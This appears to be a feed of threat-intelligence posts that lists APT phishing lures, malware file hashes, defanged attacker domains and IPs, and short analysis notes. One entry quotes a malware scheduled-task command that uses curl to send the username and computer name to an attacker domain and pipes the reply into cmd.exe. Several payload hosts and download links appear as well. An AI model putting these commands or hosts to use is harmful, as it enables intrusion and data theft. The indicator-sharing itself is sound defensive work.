#apt #pk drive.usercontent[.]google[.]com/download?id=1FCv4gbtcpWYQo5GFVFRoMaJe0_YZVBk-&export=download&authuser=0
igkashmir8@gmail.com

#dailyphish #apt #in

this actor has sent an email like this to dozens of governments, every single day, for the past 15 years. it takes them a few weeks to get banned from outlook/gmail/yahoo/etc and they move to a new one #daily_notaphish_just_weird

interesting #susp #apt payload uploaded to VT
Work. zip uploaded from Saudi Arabia 85cd2aa498a943d4c07ce75d30f6e68d
decoy. if you like .net obfuscation, this is a nice one

#cn #apt
1.zip via vt (uploaded from myanmar, mongolian lure)
03ca0221a1d7e49b72692ba12405216d -> neurosurgeryx[.]com
decoy:

nice looking #dailyphish, smells like #redteam

Are you flagging on .csproj files inside archives, being delivered by email?

#apt #unc1151 mickeymousegamesdealer.alexavegas[.]icu

This "JWT_SESSION" cookie sure looks funky, with base64 encoded data between "metaPrefix" and "metaSuffix"!
🔥 66.234.147.10:8080

#susp #dailyphish -> financeoperations1.github[.]io/ambulacecare/

#dailyphish targeting an insurance company ... a dinner invite leading to screenconnect.
subscribezoominfo.screenconnect[.]com/Bin/ScreenConnect.ClientSetup.msi?e=Access&y=Guest

susp #redteam OSCE_Election_Security_Checklist_v2.pdf.exe
600710c6ad0e4260a3879d36c5455e71
66.234.147.10

#bec #dailyphish

#dprk #apt PumpGuard-Pumpfun-AI-Attack-Defence-Requirements.pdf.zip
5c2857913efc6007b3ee7028a132baa4

#apt #bitter
Database server.rar 8cb6dee642f510d20825e49435e4f814
rar -> vhdx -> jse
->
"Maintenance\Windows10\Drivers\Graphics\VerifiedUpdaterTaskMachineGPU-X-5-93-12798962" /tr "conhost --headless cmd /c curl www.haburyohoteam[.]com/jvdmhawme.okjhvthfv?d=%username%_%computername% | cmd.exe"

not all #dailyphish are created equally

#dailyopendir #susp #redteam 172.178.44[.]139/stager/

#susp "destruction missile defense radars.pdf.exe" uploaded from qatar
1bc6281441096086b2357066d70f65e4

decoy

#susp #apt
Contact_Letter_To_Ms_Pech_ICB_Cambodia_On_Collaboration.pdf.exe
CN_Contact_Work_Cambodia's_Ministry_of_Public_Works_and_Transport.pdf
e3b51bdcb1b55cf7cb11ef4b3872776b
03e7a4065df354a99add76e8ba7dd37b

"big game" invoice scammers switching from training invoices to infosec #dailyphish

#dprk #apt

(대외보안)0223_주미한국대사관_비공개_정책간담회_계획안.pdf.lnk
1f378c0efc13669dada1fe340c6837bd

#apt
db1b11b63d631e2d0cebdefb322c2e7a
Letter to Indian Coast Guards by Def Secy.xlam
"pointless calculations"

info.updates-pbi.workers[.]dev

#susp #apt #opendir
microsoft-pakistan.ptcl-gov-pk.workers[.]dev/

 cert UA article on the below cert.gov.ua/article/6287...

4ad8d263065e46d0e2fd4183f89258ac
Weapons requirements for the Kuwait Air Force.lnk

3f25c60d96f9cbbca7fd19278545207b
دعوة للمشاركة.lnk

#susp #apt
Algerian Ukrainian proposals for cooperation. zip c73c308a137ff7805577042cc9e923e1
lnk: desktop-jm38b85
overlaps with phish against Mongolia
Хятад улстай хамтын ажиллагаагаа өргөжүүлэх төсөл.lnk
497c1ad79c4ef5425eb8a7e4f49efc8b
drops stealer that uses Mega for exfil

#apt
NATO Sanctions Package Against Russia - Belgium (February 2026)(.PDF).html

94b0039707efcd1821d4b34c13f65a75